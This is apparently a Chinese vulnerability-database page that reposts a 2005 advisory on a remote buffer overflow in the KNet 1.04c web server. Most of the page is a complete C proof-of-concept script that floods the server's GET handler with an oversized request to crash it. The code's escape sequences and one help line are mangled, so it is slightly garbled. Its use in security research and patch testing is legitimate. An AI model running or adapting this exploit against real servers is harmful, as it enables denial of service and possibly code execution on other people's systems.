Stormy Studios KNet 1.x – Remote Buffer Overflow
漏洞ID | 1054932 | 漏洞类型 | |
发布时间 | 2005-02-26 | 更新时间 | 2005-02-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12671/info
A remote buffer overflow vulnerability affects Stormy Studios KNet. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
An attacker may leverage this issue to execute arbitrary code on a computer with the privileges of the affected server, facilitating unauthorized access.
/*
KNet <= 1.04c is affected to a remote buffer overflow in GET command.
This PoC demostrate the vulnerability.
KNet <= 1.04c PoC Denial Of Service Coded by: Expanders
Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf("nn-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), ' ', 8);
printf("nnConnecting to target t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]nBuilding evil buffert...");
memset(evilbuf,90,1023);
printf("[Done]nSending evil request t...");
sprintf(request,"GET %s nrnr",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]nn[Finished] Check the server nown");
}
else
printf("[Fail] -> Unable to connectnn");
close(sockfd);
return 0;
}
void help(char *program_name) {
printf("nt-=[ KNet <= 1.04b PoC Denial Of Service ]=-n");
printf("t-=[ ]=-n");
printf("t-=[ Coded by
ders -/www.x0n3-h4ck.org\- ]=-nn");
printf("Usage: %s <Host> <Port>n",program_name);
}
相关推荐: InterScan VirusWall缓冲区溢出漏洞
InterScan VirusWall缓冲区溢出漏洞 漏洞ID 1206863 漏洞类型 缓冲区溢出 发布时间 1999-11-08 更新时间 1999-11-08 CVE编号 CVE-2001-0679 CNNVD-ID CNNVD-199911-028 漏…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666